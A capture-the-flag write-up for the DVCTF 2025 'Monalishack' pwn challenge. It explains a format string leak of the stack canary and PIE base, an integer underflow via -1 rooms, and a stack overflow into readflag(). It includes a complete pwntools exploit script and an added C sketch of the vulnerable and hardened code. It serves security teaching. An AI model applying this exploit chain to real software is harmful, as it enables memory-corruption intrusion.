DVCTF 2025 - Monalishack

Posted Sat 24 May 2025
Author cpu_eater
Category Writeup
Tags #Pwn

Vulnerabilities

This binary has three vulnerabilities:

  • Format string vulnerability when we enter our name
  • Integer underflow when we choose the number of rooms to visit
  • Stack-based buffer overflow after entering the rooms

Furthermore, this is a ret2win challenge, thanks to the readflag() function present in the binary.

Leak addresses

Before exploiting the stack-based buffer overflow, we have to leak the canary and the PIE base address.
It was possible to do so using the format string vulnerability with these offsets:

  • %3$p : canary
  • %9$p : function address in PIE

This function sits at offset 0x16fb from the PIE base address.

Ret2win

It was possible to trigger the stack-based buffer overflow by sending -1 as the number of rooms to visit.
Then, the payload is laid out this way:

  • 10 bytes of padding between the buffer and the canary
  • canary
  • 8 bytes of saved RBP (unused)
  • address of readflag() (its offset in the binary + PIE base address)
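The two input bugs that make this chain possible, as an added example that is not part of the original writeup or the challenge binary: a constructed C model of the user-controlled format string and of the signed room count that is checked only against its upper bound, each next to its hardened form. MAX_ROOMS, the function names and the per-room size are assumptions.

```c
#include <stdio.h>
#include <stdint.h>

#define MAX_ROOMS 8      /* constructed limit, not the challenge's */

/* Room count (integer underflow bug): signed count, only the upper bound
 * checked, so -1 is accepted. Each check returns 1 if the count passes. */
int vulnerable_room_check(int rooms)
{
    return rooms <= MAX_ROOMS;               /* -1 passes */
}

int hardened_room_check(int rooms)
{
    return rooms > 0 && rooms <= MAX_ROOMS;  /* rejects 0 and negatives */
}

/* Size a per-room loop would use once the signed count becomes size_t:
 * -1 turns into SIZE_MAX, so the loop runs far past the stack buffer. */
size_t bytes_for_rooms(int rooms, size_t per_room)
{
    return (size_t)rooms * per_room;
}

/* Format string bug: user input is passed as the format itself, so
 * "%3$p-%9$p" makes printf read stack slots instead of printing a name. */
void greet_vulnerable(const char *name)
{
    printf("Hello, ");
    printf(name);                            /* format string vuln */
    printf("\n");
}

/* Hardened: the user string is only an argument, never the format.
 * Returns the length snprintf produced so callers can check it. */
int greet_hardened(const char *name, char *out, size_t outlen)
{
    return snprintf(out, outlen, "Hello, %s\n", name);
}

int main(void)
{
    char out[80];
    greet_hardened("%3$p-%9$p", out, sizeof out);
    fputs(out, stdout);                      /* directives printed literally */
    printf("-1 accepted? vulnerable=%d hardened=%d\n",
           vulnerable_room_check(-1), hardened_room_check(-1));
    return 0;
}
```

Compiling with -Wformat-security (or -Wformat=2) flags the printf(name) call at build time, which is the cheapest check for this bug class.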

Exploit

from pwn import *

host = "813c5bf7b00db4f393aa8480c7dafeda.chall.dvc.tf"
port = 443

elf = ELF("./Monalishack")
p = remote(host, port, ssl=True)

# Format string vuln: leak the canary (%3$p) and a PIE address (%9$p)
p.recvuntil(b"Enter your name :")
p.sendline(b"%3$p-%9$p")
p.recvuntil(b"4. Quit")
p.sendline(b"1")
p.recv()
leak = p.recv().split(b'\n')[1].split(b'-')

canary, pie_leak = int(leak[0], 16), int(leak[1], 16)
base_pie = pie_leak - 0x16fb  # leaked function sits at offset 0x16fb

p.sendline(b"3")   # Third menu choice
p.sendline(b"-1")  # Number of rooms -> integer underflow -> triggers the stack BOF
# padding | canary | saved RBP (unused) | readflag()
p.sendline(b'A'*10 + p64(canary) + cyclic(8) + p64(base_pie + elf.sym["readflag"]))
p.interactive()